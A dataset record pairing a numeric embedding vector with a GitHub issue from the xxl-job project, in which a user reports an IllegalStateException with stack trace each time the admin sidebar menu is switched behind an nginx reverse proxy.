0.006503515411168337, 0.020598165690898895, 0.005430694203823805, 0.010824394412338734, 0.003068638266995549, -0.00001839575998019427, 0.00838280189782381, 0.00609288364648819, -0.01169005036354065, -0.016543641686439514, -0.0011162888258695602, 0.027197863906621933, -0.0018774368800222874, -0.004261689260601997, 0.0032517577055841684, -0.011897215619683266, 0.00921146385371685, -0.008619562722742558, 0.02542215958237648, -0.001562989316880703, 0.03246578574180603, 0.02206312119960785, 0.01021769642829895, -0.024312345311045647, 0.002748641651123762, 0.026591164991259575, 0.011275719851255417, 0.002339859725907445, -0.0021178966853767633, -0.00903389323502779, 0.0036734873428940773, 0.012851656414568424, 0.01524145808070898, 0.016454854980111122, 0.015640990808606148, 0.008101648651063442, -0.02173757553100586, 0.0021308446303009987, -0.028648022562265396, -0.011771436780691147, -0.018926043063402176, -0.009855156764388084, 0.006710680667310953, 0.0270942822098732, -0.017801431939005852, -0.0017248373478651047, -0.007998066022992134, 0.0022492248099297285, -0.028899580240249634, 0.004291284363716841, -0.015537409111857414, 0.0111869340762496, 0.012400331906974316, 0.0004649662005249411, -0.0013955922331660986, 0.014427593909204006, -0.002167838392779231, -0.00676987087354064, -0.008693549782037735, 0.012955239042639732, 0.005193933844566345, -0.0021548906806856394, 0.022507047280669212, -0.03074927255511284, -0.003569904714822769, 0.02375003881752491, -0.009048691019415855, -0.002920662984251976, 0.004110014531761408, 0.011638259515166283, -0.013613729737699032, 0.016306880861520767, -0.03273214027285576, 0.004572437610477209, 0.006396233104169369, 0.027834158390760422, 0.010609830729663372, 0.005212430842220783, -0.013088417239487171, 0.015862954780459404, -0.018881650641560555, -0.00668108556419611, 0.009070887230336666, -0.004361572675406933, -0.00509405042976141, 0.010003131814301014, 0.00819043442606926, -0.01673600822687149, 0.01021029707044363, 0.034271083772182465, -0.005156939849257469, 0.005785834975540638, -0.0013364021433517337, 0.0014853023458272219, -0.012992233037948608, -0.010173303075134754, -0.003634643740952015, 0.01568538323044777, -0.02675393782556057, 0.003281352808699012, -0.022344274446368217, -0.014834525994956493, 0.0019902680069208145, -0.002807831624522805, -0.00886372197419405, -0.01419083308428526, -0.015256255865097046, -0.0069918339140713215, -0.009337242692708969, -0.01339176669716835, 0.02844085730612278, -0.007753906771540642, -0.01670641452074051, 0.024608295410871506, 0.010950174182653427, -0.007557839620858431, 0.0038658552803099155, -0.004994167014956474, -0.023838823661208153, 0.00603369390591979, -0.02403119206428528, -0.012977436184883118, 0.011112947016954422, -0.010158506222069263, 0.006333343684673309, 0.03441905975341797, 0.008604764938354492, -0.004783302079886198, -0.005345608573406935, -0.013095815666019917, 0.00853817630559206, -0.016987567767500877, 0.022344274446368217, 0.0057044485583901405, -0.014782734215259552, -0.004254290368407965, -0.018289750441908836, -0.026990698650479317, -0.0025007829535752535, 0.00005982596121612005, 0.017786633223295212, 0.0006829986232332885, -0.007487551309168339, -0.0027097980491816998, 0.01806778647005558, -0.005504682194441557, -0.02312854304909706, -0.008501182310283184, -0.02073134295642376, -0.01808258518576622, 0.015507813543081284, 0.025954872369766235, -0.0021141974721103907, -0.002521129557862878, -0.018615296110510826, -0.007051024120301008, -0.01904442347586155, -0.007158306427299976, 0.004483652301132679, 0.0036753369495272636, 0.0006016121478751302, -0.025688515976071358, 0.01607012003660202, 0.004073020536452532, 0.03151874244213104, 0.017209529876708984, 0.0018885351018980145, 0.010853989981114864, -0.0031851688399910927, 0.009196666069328785, 0.017638659104704857, -0.010669020935893059, -0.010114112868905067, -0.0007033452275209129, 0.029328709468245506, -0.012644491158425808, 0.015115679241716862, 0.005175436846911907, -0.014656955376267433, 0.009285451844334602, 0.002582169370725751, 0.010447057895362377, 0.016795199364423752, 0.0021141974721103907, 0.00044716292177326977, -0.004317179787904024, 0.007143508642911911, 0.0077761029824614525, -0.011223928071558475, -0.028574034571647644, 0.01574457436800003, 0.010602431371808052, 0.0031074818689376116, -0.005782135762274265, -0.01575937122106552, 0.00385475717484951, -0.005852424073964357, -0.004224695265293121, -0.006821662187576294, 0.003013147506862879, -0.014590366743505001, -0.002918813144788146, 0.0016258788527920842, 0.010202898643910885, 0.00585982296615839, -0.0160257276147604, 0.014442391693592072, 0.02244785614311695, 0.00173593545332551, -0.008331011049449444, 0.0028281782288104296, 0.0075652385130524635, 0.009122679010033607, 0.0007190675823949277, -0.015145273879170418, -0.010350873693823814, -0.00618166895583272, -0.0018321194220334291, -0.002437893534079194, -0.001804374041967094, -0.007465355098247528, 0.007346974685788155, 0.006000399123877287, -0.010950174182653427, 0.005071854218840599, -0.025570135563611984, 0.002452690852805972, -0.03113400749862194, -0.000755136541556567, 0.030986031517386436, -0.027331041172146797, -0.015012096613645554, -0.004073020536452532, 0.002005065558478236, -0.004957173485308886, 0.019621526822447777, -0.009403831325471401, 0.008020262233912945, 0.00393984280526638, -0.0054528904147446156, -0.012836859561502934, -0.018585700541734695, -0.018659688532352448, 0.015226660296320915, -0.01575937122106552, 0.0008305115043185651, 0.021560003980994225, -0.00662189582362771, 0.0008106273016892374, -0.0021271451842039824, 0.005574970040470362, -0.014775335788726807, 0.000051762461225735024, -0.02815970405936241, -0.012289350852370262, -0.01369511615484953, 0.006899349391460419, -0.012274553067982197, -0.01322159543633461, 0.006451724097132683, 0.0018589399987831712, 0.012437325902283192, -0.025348173454403877, 0.0032092148903757334, -0.006392533890902996, 0.007398765999823809, -0.012400331906974316, 0.010350873693823814, 0.005323412362486124, 0.023602064698934555, -0.028174500912427902, -0.01939956471323967, -0.013591533526778221, -0.018866853788495064, 0.0070103309117257595, -0.0029576567467302084, -0.0184229277074337, -0.0020346606615930796, 0.017845824360847473, -0.0177274439483881, -0.005212430842220783, 0.018600497394800186, 0.0025081816129386425, -0.013169803656637669, -0.003421929432079196, 0.015056489035487175, 0.02377963438630104, -0.003016846952959895, 0.016588034108281136, -0.008419795893132687, -0.022137107327580452, -0.0034940673504024744, 0.0160257276147604, -0.0001423106441507116, -0.01876327022910118, 0.0014797531766816974, -0.014671753160655499, -0.010143708437681198, -0.025259386748075485, -0.02076093852519989, -0.011926811188459396, 0.02710907906293869, 0.00968498457223177, 0.00494237570092082, -0.01419083308428526, 0.013347374275326729, 0.010417462326586246, 0.000105259008705616, 0.0061742705292999744, 0.013650723733007908, 0.018985234200954437, -0.0010210297768935561, -0.01868928223848343, -0.025510946288704872, 0.01419083308428526, -0.006928944494575262, 0.004783302079886198, -0.0017026410205289721, -0.005911614280194044, -0.006251957267522812, -0.008353207260370255, 0.0007352523971349001, 0.0035551071632653475, -0.004997866693884134, -0.032584164291620255, -0.013613729737699032, -0.0001476285106036812, 0.021530408412218094, 0.020583366975188255, -0.004431860987097025, 0.010964971035718918, -0.008945108391344547, -0.009455623105168343, -0.015463421121239662, -0.01803819090127945, 0.01611451245844364, 0.005164338741451502, -0.021693183109164238, -0.003723429050296545, -0.014383201487362385, 0.012355939485132694, 0.0038584566209465265, -0.0033904844895005226, -0.009300248697400093, 0.005045958328992128, 0.005023762118071318, -0.009307648055255413, -0.012170970439910889, -0.012799865566194057, 0.016514046117663383, -0.008227427490055561, -0.00853077694773674, -0.007753906771540642, 0.011786234565079212, -0.007195299956947565, -0.0003054303233511746, 0.014760538004338741, 0.007672520354390144, -0.009218862280249596, 0.025866085663437843, 0.0023084150161594152, -0.010410063900053501, -0.002160439733415842, 0.005212430842220783, -0.010247291065752506, 0.0037715209182351828, 0.010410063900053501, -0.0030797363724559546, -0.0011930509936064482, -0.012133976444602013, -0.01601092889904976, -0.011956405825912952, -0.0037086314987391233, 0.01701716147363186, 0.018482116982340813, 0.003142625791952014, 0.009278052486479282, -0.010802198201417923, 0.0032591563649475574, 0.002047608606517315, -0.024697082117199898, -0.0016878434689715505, -0.006514613516628742, -0.012918245978653431, 0.0009035742841660976, 0.022359071299433708, -0.016854388639330864, -0.016943173483014107, -0.01876327022910118, -0.017905013635754585, -0.01766825281083584, -0.008331011049449444, -0.012096982449293137, 0.039953336119651794, -0.01169005036354065, -0.008331011049449444, -0.023143339902162552, 0.025362970307469368, 0.0004910930874757469, 0.021604396402835846, -0.034951772540807724, 0.00785748939961195, -0.01669161580502987, -0.007354373577982187, 0.035306911915540695, 0.0040064319036901, -0.014679151587188244, 0.023335708305239677, -0.012999632395803928, -0.015981335192918777, 0.004246891941875219, -0.01054324209690094, -0.007380269002169371, -0.004243192262947559, -0.01675080694258213, -0.01106115523725748, 0.006570104509592056, -0.008227427490055561, -0.006910447496920824, 0.014642158523201942, 0.0070251282304525375, -0.029506279155611992, 0.004860989283770323, 0.018911246210336685, -0.01001792959868908, -0.009929143823683262, 0.005234627053141594, 0.004257990047335625, 0.003817763412371278, 0.027567801997065544, 0.010816995985805988, 0.016336476430296898, 0.0073099806904792786, 0.00721009774133563, -0.00015017183613963425, -0.014679151587188244, -0.01808258518576622, 0.001114439102821052, 0.015996132045984268, -0.013295582495629787, -0.000018323506083106622, 0.013650723733007908, 0.005648958031088114, 0.009869953617453575, 0.015093483030796051, 0.018274951726198196, 0.0031759203411638737, -0.007339575793594122, -0.027700981125235558, -0.020834924653172493, 0.004716713447123766, 0.010765204206109047, -0.019887883216142654, 0.012304147705435753, -0.0019810195080935955, -0.004550240933895111, 0.0017026410205289721, -0.006044792011380196, -0.00385475717484951, 0.0029595063533633947, 0.027493814006447792, -0.016957972198724747, 0.01004012580960989, 0.011490283533930779, 0.010439658537507057, 0.014597765170037746, -0.02175237238407135, -0.0007657723035663366, -0.005656356457620859, 0.03039413131773472, -0.015315446071326733, 0.0012846107129007578, -0.012607497163116932, 0.011830626986920834, -0.003538459772244096, -0.005101449321955442, 0.011468087323009968, -0.01004012580960989, 0.02370564639568329, 0.007790900766849518, -0.00016635663632769138, -0.007317379582673311, 0.009019095450639725, 0.003005748614668846, 0.015315446071326733, -0.010765204206109047, 0.0211308766156435, 0.007605931721627712, 0.001165305613540113, 0.006107681430876255, 0.007983268238604069, -0.028884783387184143, -0.020820127800107002, 0.0021733874455094337, 0.00006173345173010603, 0.006910447496920824, -0.001787726883776486, -0.02548135071992874, -0.0041322107426822186, 0.01806778647005558, 0.023838823661208153, -0.03080846183001995, -0.012637092731893063, 0.0021548906806856394, -0.00838280189782381, 0.003375686937943101, 0.004158106632530689, 0.0021974334958940744, 0.01836373656988144, 0.0001268194755539298, 0.02247745171189308, -0.004398566670715809, -0.022255487740039825, 0.00850858073681593, -0.015848156064748764, -0.011771436780691147, 0.01238553412258625, -0.0008744416409172118, -0.004986768122762442, 0.015256255865097046, 0.011845424771308899, 0.0031148805283010006, -0.00668108556419611, 0.013687717728316784, -0.004217296838760376, 0.013095815666019917, 0.01979909837245941, -0.006000399123877287, 0.005952307488769293, -0.014819728210568428, -0.014338809065520763, -0.016839591786265373, 0.004291284363716841, 0.005537976510822773, -0.010106714442372322, -0.019325576722621918, -0.00035467834095470607, -0.01609971560537815, 0.00603369390591979, -0.00803506001830101, 0.026339607313275337, 0.013073619455099106, 0.006070687435567379, 0.018186166882514954, -0.01944395713508129, 0.014057655818760395, -0.0005290117696858943, 0.011371903121471405, 0.008257023058831692, -0.002793034305796027, -0.010084518231451511, 0.01205998845398426, -0.001736860373057425, -0.02404598891735077, -0.004128511529415846, -0.006103982217609882, -0.02340969629585743, 0.001114439102821052, -0.001658248482272029, 0.008567770943045616, 0.012748073786497116, 0.022225894033908844, 0.023350505158305168, 0.011120345443487167, -0.002652457682415843, -0.011505081318318844, 0.009596199728548527, -0.0010506247635930777, -0.001036752131767571, 0.0017553572542965412, -0.013228993862867355, -0.00818303506821394, 0.004320879466831684, -0.0011847274145111442, -0.015996132045984268, 0.006374036893248558, 0.007051024120301008, -0.020154239609837532, 0.013088417239487171, -0.022595832124352455, 0.01738709956407547, 0.012792466208338737, 0.006407331209629774, -0.008952506817877293, -0.016469653695821762, -0.010743007995188236, -0.0036605396308004856, -0.0012503914767876267, -0.00025132682640105486, -0.003925045486539602, -0.02814490534365177, 0.014471986331045628, 0.0020568568725138903, 0.008900715969502926, -0.028307678177952766, 0.006980735808610916, 0.0421137772500515, -0.005808031186461449, -0.02277340181171894, -0.02838166616857052, 0.005626761820167303, 0.000500341528095305, 0.00100068305619061, 0.009352040477097034, -0.0019921178463846445, 0.0087083475664258, 0.014361005276441574, -0.01036567147821188, -0.0012059988221153617, -0.004391167778521776, 0.0187336765229702, 0.0037012328393757343, -0.030334940180182457, -0.0051680379547178745, 0.0008013788610696793, -0.0037733707576990128, 0.01404285803437233, -0.007938875816762447, 0.011749240569770336, 0.004150707740336657, 0.013206797651946545, -0.025570135563611984, -0.028292881324887276, -0.006362938787788153, -0.008908114396035671, 0.01675080694258213, -0.01051364652812481, 0.013532343320548534, -0.011838025413453579, -0.0054010991007089615, -0.01206738781183958, 0.011142541654407978, 0.010521044954657555, 0.014812329784035683, -0.012873852625489235, -0.0028688714373856783, -0.01121652964502573, 0.009596199728548527, -0.002221479546278715, 0.009159672074019909, 0.055372364819049835, 0.019221995025873184, -0.020627759397029877, -0.00603369390591979, -0.005279019474983215, 0.02009504847228527, -0.0020790533162653446, -0.00800546444952488, 0.0010681968415156007, -0.011349706910550594, -0.022003930062055588, 0.0033053988590836525, -0.004010131116956472, -0.013325178064405918, -0.00935943890362978, 0.0014575569657608867, -0.001242992701008916, -0.00468341913074255, 0.011423694901168346, -0.0025581233203411102, 0.014131642878055573, 0.010239892639219761, -0.03014257363975048, 0.004050824325531721, 0.01069121714681387, 0.0115346759557724, 0.009070887230336666, 0.008797133341431618, 0.020183833315968513, 0.006425828207284212, 0.02475627139210701, 0.010920578613877296, -0.022255487740039825, -0.008116446435451508, 0.008545574732124805, 0.006266755051910877, 0.021234458312392235, -0.004746308550238609, 0.017283517867326736, 0.001821946119889617, 0.0045835357159376144, 0.008427194319665432, 0.005112547427415848, -0.011342308484017849, -0.013376968912780285, 0.005312314257025719, -0.0007241542334668338, -0.000026430358047946356, -0.006392533890902996, -0.0164104625582695, -0.024697082117199898, 0.004875787068158388, -0.00329799996688962, 0.01935517229139805, 0.009699782356619835, 0.013672919943928719, -0.005023762118071318, -0.019517945125699043, 0.003203665604814887, -0.008353207260370255, -0.007953673601150513, -0.011268320493400097, -0.002243675757199526, -0.00856037251651287, 0.011024161241948605, 0.005053357221186161, 0.016528842970728874, -0.012156172655522823, -0.007613330148160458, 0.005408497992902994, -0.0041803028434515, -0.002824479015544057, -0.011468087323009968, 0.013954073190689087, -0.006044792011380196, -0.023217327892780304, -0.02576250396668911, 0.018200963735580444, -0.014109446667134762, -0.02346888557076454, 0.003973137587308884, 0.002756040310487151, 0.014131642878055573, -0.02172277681529522, -0.006407331209629774, 0.003336843568831682, -0.013354772701859474, 0.010816995985805988, 0.012481718324124813, 0.016514046117663383, 0.011675252579152584, 0.0057044485583901405, 0.018319344148039818, 0.0007925928221084177, 0.003932444378733635, 0.011394099332392216, 0.01406505424529314, 0.01324379164725542, -0.013132809661328793, 0.009729376994073391, 0.004565038718283176, -0.001400216482579708, 0.03045332059264183, 0.0013521244982257485, -0.0019440257456153631, 0.015078685246407986, 0.009951340034604073, 0.009019095450639725, 0.021145673468708992, 0.010469254106283188, -0.012296749278903008, 0.004509547725319862, -0.016809996217489243, -0.00376782170496881, -0.0021715378388762474, 0.0051199463196098804, -0.013902281410992146, -0.0025932674761861563, -0.006366638001054525, 0.000008959443221101537, -0.00783529318869114, -0.0004053136508446187, 0.015300648286938667, -0.012666687369346619, 0.023542873561382294, 0.008434593677520752, 0.0023158136755228043, -0.011394099332392216, -0.009995733387768269, -0.01868928223848343, 0.011142541654407978, -0.0061742705292999744, 0.02670954540371895, 0.020257821306586266, 0.024608295410871506, -0.02348368428647518, -0.009152273647487164, 0.012466920539736748, 0.0026062154211103916, -0.0067772697657346725, -0.0033738373313099146, -0.01336217112839222, -0.010935376398265362, -0.0064924173057079315, 0.0056896512396633625, -0.018186166882514954, -0.026236023753881454, -0.0017562820576131344, -0.003603199031203985, -0.01572977751493454, -0.005793233867734671, 0.01806778647005558, 0.007158306427299976, -0.005079253111034632, -0.0031315276864916086, 0.015596599318087101, 0.01905922219157219, -0.026324810460209846, 0.016928376629948616, -0.0013678468530997634, 0.03077886626124382, -0.008242225274443626, -0.007953673601150513, 0.0013863438507542014, 0.009655389934778214, -0.010824394412338734, 0.009810763411223888, 0.012999632395803928, -0.02411997690796852, 0.007983268238604069, 0.00385475717484951, -0.004257990047335625, 0.004032327327877283, -0.0017118895193561912, 0.00226587220095098, -0.007395066786557436, 0.005623062141239643, 0.0027504912577569485, 0.007213796954602003, 0.012859055772423744, -0.00031490999390371144, -0.006799465976655483, 0.00955920573323965, 0.0253925658762455, 0.0016517745098099113, -0.0012744374107569456, -0.0072581893764436245, 0.00196992140263319, -0.02409038320183754, 0.01055803894996643, -0.02002106048166752, 0.025614527985453606, 0.010632026940584183, 0.017520278692245483, -0.018926043063402176, 0.004076720215380192, 0.015078685246407986, -0.0013290033675730228, -0.015907347202301025, -0.0321994312107563, 0.007487551309168339, 0.0036771867889910936, -0.022995365783572197, 0.0035458586644381285, 0.016188500449061394, -0.0051902346312999725, -0.020317012444138527, 0.005034860223531723, -0.010047524236142635, 0.004513247404247522, 0.012400331906974316, -0.011201731860637665, 0.02704988792538643, 0.049039021134376526, 0.009270654059946537, -0.001192126190289855, -0.018496915698051453, 0.018008597195148468, -0.01218576729297638, 0.005796933081001043, -0.028588831424713135, -0.00803506001830101, 0.014952906407415867, -0.0012920094886794686, 0.018659688532352448, 0.0056526572443544865, -0.020968103781342506, -0.005959705915302038, 0.018822461366653442, -0.0170319601893425, 0.014434992335736752, 0.01321419607847929, -0.002391651039943099, -0.01373950857669115, -0.0014529327163472772, 0.011046357452869415, -0.015433826483786106, -0.019858287647366524, -0.0012809113832190633, 0.018200963735580444, 0.005264222156256437, 0.02780456282198429, 0.025866085663437843, 0.007139809429645538, 0.002497083507478237, 0.00500896479934454, -0.00886372197419405, -0.0030797363724559546, 0.008368004113435745, 0.007953673601150513, 0.01504909060895443, 0.0017294615972787142, -0.006129877641797066, -0.002787485020235181, 0.007746507879346609, 0.012600098736584187, 0.00459093414247036, -0.004106315318495035, 0.010306481271982193, -0.020509378984570503, -0.000010628500604070723, -0.00585982296615839, 0.017490683123469353, 0.024859854951500893, -0.006636693142354488, -0.01975470595061779, -0.017786633223295212, 0.023661253973841667, 0.001295708934776485, -0.00183951819781214, -0.012829460203647614, -0.0015648390399292111, 0.016913579776883125, -0.0015666887629777193, -0.010639425367116928, 0.02511141262948513, 0.006869754288345575, 0.009951340034604073, -0.024001596495509148, 0.004927578382194042, -0.002278819913044572, 0.017268719151616096, -0.0024471418000757694, 0.00001499984227848472, 0.015507813543081284, 0.002521129557862878, -0.002831877674907446, 0.006755073554813862, 0.0009747874573804438, -0.01271847914904356, -0.00028947670944035053, 0.023631658405065536, 0.002106798579916358, 0.015359838493168354, -0.0030279450584203005, -0.00938903447240591, 0.003314647125080228, 0.020538974553346634, -0.007051024120301008, 0.012415129691362381, -0.02808571606874466, -0.013399165123701096, 0.01876327022910118, -0.016898781061172485, -0.011423694901168346, 0.015951739624142647, -0.018852056935429573, 0.000885539804585278, -0.035573266446590424, -0.0031056320294737816, 0.010617229156196117, 0.013783900998532772, 0.019562337547540665, -0.005075553432106972, 0.009329844266176224, -0.013820894993841648, 0.0038399596232920885, -0.004905381705611944, 0.013510147109627724, 0.0070103309117257595, -0.005160639528185129, 0.016898781061172485, -0.018807662650942802, 0.017979001626372337, -0.005752540659159422, 0.010343475267291069, -0.0009447299526073039, -0.013317778706550598, 0.0160257276147604, 0.00986255519092083, -0.0046353270299732685, 0.02771577797830105, 0.00259141786955297, -0.007946275174617767, -0.027908146381378174, 0.0032776533626019955, -0.007332177367061377, -0.0018802114063873887, -0.014686550945043564, -0.00783529318869114, -0.002497083507478237, -0.023306112736463547, -0.014338809065520763, -0.00003872791785397567, -0.000621496350504458, -0.010254689492285252, -0.0018792866030707955, 0.024341940879821777, 0.020908912643790245, 0.009921745397150517, 0.010254689492285252, -0.010706014931201935, -0.00853817630559206, -0.005449191201478243, -0.005138442851603031, 0.005286418367177248, -0.0008249623933807015, 0.0035625058226287365, -0.010025328025221825, -0.01707635261118412, -0.03166671842336655, 0.0049201794900000095, 0.006732877343893051, -0.005201332736760378, -0.006015196908265352, -0.0005544450250454247, 0.02206312119960785, -0.011024161241948605, 0.005127344746142626, 0.0032332607079297304, 0.001495475647971034, 0.01845252327620983, -0.009315046481788158, 0.0013595232740044594, 0.003575453767552972, 0.0016517745098099113, 0.029343506321310997, 0.002278819913044572, 0.019858287647366524, -0.017949406057596207, -0.02173757553100586, 0.013354772701859474, 0.001538943382911384, -0.012651889584958553, 0.0054750870913267136, -0.04312000796198845, -0.013339974917471409, 0.007232293952256441, 0.019562337547540665, 0.0045798360370099545, -0.008049857802689075, -0.0036938339471817017, 0.00018496914708521217, -0.002445292193442583, 0.01322159543633461, 0.00577103765681386, -0.009418629109859467, -0.005297516472637653, 0.010047524236142635, 0.014486784115433693, -0.010772603563964367, -0.0021530408412218094, 0.05353747308254242, 0.007938875816762447, 0.0007398765883408487, 0.014434992335736752, 0.005512080620974302, 0.004483652301132679, -0.011342308484017849, -0.00502746133133769, 0.013798698782920837, 0.012666687369346619, -0.002202982548624277, -0.00709911622107029, 0.006710680667310953, -0.01734270714223385, -0.0046686213463544846, -0.004605731926858425, -0.011268320493400097, 0.01904442347586155, -0.024297548457980156, -0.018260154873132706, -0.010099316015839577, 0.008316213265061378, 0.024489914998412132, -0.005730344448238611, -0.012799865566194057, 0.014775335788726807, 0.03154833987355232, -0.019947072491049767, -0.004742608871310949, -0.012252356857061386, 0.03640192747116089, -0.01978429965674877, -0.0033997329883277416, -0.007387667894363403, 0.013273386284708977, 0.007702115457504988, 0.006041092332452536, 0.011749240569770336, 0.0001897089823614806, -0.01712074503302574, 0.00744685810059309, 0.0020938508678227663, -0.022196298465132713, 0.023261720314621925, 0.024993032217025757, 0.0032332607079297304, -0.01421302929520607, 0.016454854980111122, 0.010780001990497112, 0.012481718324124813, 0.009906947612762451, -0.00618536863476038, 0.008612163364887238, -0.006100282538682222, 0.006636693142354488, 0.0017165137687698007, 0.0004492438165470958, -0.013554539531469345, -0.0030612393748015165, -0.024623094126582146, -0.014494182541966438, -0.004524345509707928, -0.010898382402956486, -0.0022066819947212934, -0.020982900634407997, -0.005397399887442589, -0.007302582263946533, 0.014161238446831703, -0.02509661391377449, 0.02616203762590885, 0.007346974685788155, -0.01236333791166544, -0.0075430418364703655, 0.013147607445716858, -0.010550640523433685, -0.008249624632298946, 0.008397599682211876, 0.008471586741507053, -0.000664964085444808, 0.00007947893027449027, 0.0023639057762920856, 0.0018718878272920847, 0.00024531534290872514, -0.011120345443487167, -0.014338809065520763, -0.004050824325531721, 0.002195583889260888, -0.0005803407402709126, -0.012415129691362381, 0.005408497992902994, 0.0064924173057079315, 0.012918245978653431, -0.005748841445893049, -0.01071341335773468, 0.0019902680069208145, -0.01737230271100998, -0.009758972562849522, 0.0253925658762455, -0.0014834526227787137, 0.02943229116499424, 0.00009473889076616615, -0.0033386931754648685, -0.016454854980111122, 0.00819043442606926, 0.005752540659159422, 0.02006545290350914, 0.002064255764707923, 0.004158106632530689, -0.02074613980948925, -0.003349791280925274, 0.012651889584958553, -0.008390200324356556, -0.020538974553346634, 0.015552205964922905, 0.0031574233435094357, -0.003325745463371277, -0.004716713447123766, -0.0021881849970668554, -0.008523378521203995, -0.0075615388341248035, 0.001018255134113133, -0.01472354494035244, 0.023557670414447784, 0.02277340181171894, 0.009418629109859467, -0.01907401904463768, 0.004172903951257467, 0.019488349556922913, 0.0008832276798784733, 0.014923310838639736, -0.0035366101656109095, 0.006385134998708963, 0.0009599899058230221, -0.011601265519857407, 0.0056526572443544865, 0.013088417239487171, -0.002809681463986635, 0.014434992335736752, 0.006292650476098061, -0.009921745397150517, 0.022906579077243805, 0.05344868451356888, -0.010121512226760387, 0.015818562358617783, -0.015182267874479294, 0.0013410263927653432, 0.002565522212535143, 0.005378902889788151, -0.0020161636639386415, -0.012489116750657558, 0.022655021399259567, 0.0035551071632653475, -0.0024563902989029884, -0.0009877352276816964, -0.0029521076940000057, 0.01938476786017418, 0.008109048008918762, 0.01577416993677616, -0.0023639057762920856, -0.0027245956007391214, 0.0017673802794888616, 0.004317179787904024, -0.00653311051428318, 0.011490283533930779, 0.0064739203080534935, 0.008308813907206059, -0.0034940673504024744, -0.00043652718886733055, 0.006485018413513899, 0.006751373875886202, -0.019236791878938675, -0.011149940080940723, 0.009396432898938656, -0.0015750123420730233, 0.01574457436800003, -0.012955239042639732, 0.012437325902283192, -0.009159672074019909, 0.02746422030031681, 0.0046316273510456085, 0.004280186258256435, 0.01704675704240799, -0.022936174646019936, -0.0005188384675420821, 0.032820925116539, -0.008819329552352428, -0.003249908098950982, -0.004239493049681187, -0.005282719153910875, -0.002756040310487151, 0.0027079484425485134, -0.0043467748910188675, 0.007221195846796036, 0.0003611522843129933, -0.008974703028798103, 0.005967104807496071, 0.01218576729297638, 0.010669020935893059, 0.027952538803219795, -0.015478218905627728, 0.007679919246584177, -0.020257821306586266, -0.0031222791876643896, 0.016336476430296898 ]
null
null
null
null
null
null
null
null
null
[ "xuxueli", "xxl-job" ]
Please answer some questions before submitting your issue. Thanks! ### Which version of XXL-JOB do you using? <groupId>com.xuxueli</groupId> <artifactId>xxl-job</artifactId> <version>2.4.1-SNAPSHOT</version> <packaging>pom</packaging> ### Expected behavior 报错信息: ![image](https://github.com/xuxueli/xxl-job/assets/69661392/bcdbdf62-feb9-4198-b5c7-6409fe7cf79a) ERROR o.a.c.c.C.[.[.[.[dispatcherServlet] - Servlet.service() for servlet [dispatcherServlet] in context with path [/admin] threw exception [Request processing failed; nested exception is java.lang.IllegalStateException: getOutputStream() has already been called for this response] with root cause java.lang.IllegalStateException: getOutputStream() has already been called for this response at org.apache.catalina.connector.Response.getWriter(Response.java:572) at org.apache.catalina.connector.ResponseFacade.getWriter(ResponseFacade.java:189) at org.springframework.web.servlet.view.freemarker.FreeMarkerView.processTemplate(FreeMarkerView.java:391) at org.springframework.web.servlet.view.freemarker.FreeMarkerView.doRender(FreeMarkerView.java:304) at org.springframework.web.servlet.view.freemarker.FreeMarkerView.renderMergedTemplateModel(FreeMarkerView.java:255) at org.springframework.web.servlet.view.AbstractTemplateView.renderMergedOutputModel(AbstractTemplateView.java:181) at org.springframework.web.servlet.view.AbstractView.render(AbstractView.java:316) at org.springframework.web.servlet.DispatcherServlet.render(DispatcherServlet.java:1406) at org.springframework.web.servlet.DispatcherServlet.processDispatchResult(DispatcherServlet.java:1150) at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:1089) at org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:965) at org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:1006) at org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:898) at javax.servlet.http.HttpServlet.service(HttpServlet.java:529 环境: linuxjar包部署,nginx反向代理 步骤: 域名登陆admin后台,切换一次左侧栏菜单,就报错一次。
java.lang.IllegalStateException: getOutputStream() has already been called for this response] with root cause
https://api.github.com/repos/xuxueli/xxl-job/issues/3404/comments
0
2024-03-15T09:05:34
2024-03-15T09:05:34Z
https://github.com/xuxueli/xxl-job/issues/3404
2,188,038,127
3,404
false
This is a GitHub Issue repo:xxl-job owner:xuxueli Title : java.lang.IllegalStateException: getOutputStream() has already been called for this response] with root cause Issue date: --- start body --- Please answer some questions before submitting your issue. Thanks! ### Which version of XXL-JOB do you using? <groupId>com.xuxueli</groupId> <artifactId>xxl-job</artifactId> <version>2.4.1-SNAPSHOT</version> <packaging>pom</packaging> ### Expected behavior 报错信息: ![image](https://github.com/xuxueli/xxl-job/assets/69661392/bcdbdf62-feb9-4198-b5c7-6409fe7cf79a) ERROR o.a.c.c.C.[.[.[.[dispatcherServlet] - Servlet.service() for servlet [dispatcherServlet] in context with path [/admin] threw exception [Request processing failed; nested exception is java.lang.IllegalStateException: getOutputStream() has already been called for this response] with root cause java.lang.IllegalStateException: getOutputStream() has already been called for this response at org.apache.catalina.connector.Response.getWriter(Response.java:572) at org.apache.catalina.connector.ResponseFacade.getWriter(ResponseFacade.java:189) at org.springframework.web.servlet.view.freemarker.FreeMarkerView.processTemplate(FreeMarkerView.java:391) at org.springframework.web.servlet.view.freemarker.FreeMarkerView.doRender(FreeMarkerView.java:304) at org.springframework.web.servlet.view.freemarker.FreeMarkerView.renderMergedTemplateModel(FreeMarkerView.java:255) at org.springframework.web.servlet.view.AbstractTemplateView.renderMergedOutputModel(AbstractTemplateView.java:181) at org.springframework.web.servlet.view.AbstractView.render(AbstractView.java:316) at org.springframework.web.servlet.DispatcherServlet.render(DispatcherServlet.java:1406) at org.springframework.web.servlet.DispatcherServlet.processDispatchResult(DispatcherServlet.java:1150) at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:1089) at org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:965) at org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:1006) at org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:898) at javax.servlet.http.HttpServlet.service(HttpServlet.java:529 环境: linuxjar包部署,nginx反向代理 步骤: 域名登陆admin后台,切换一次左侧栏菜单,就报错一次。 --- end body ---
2,377
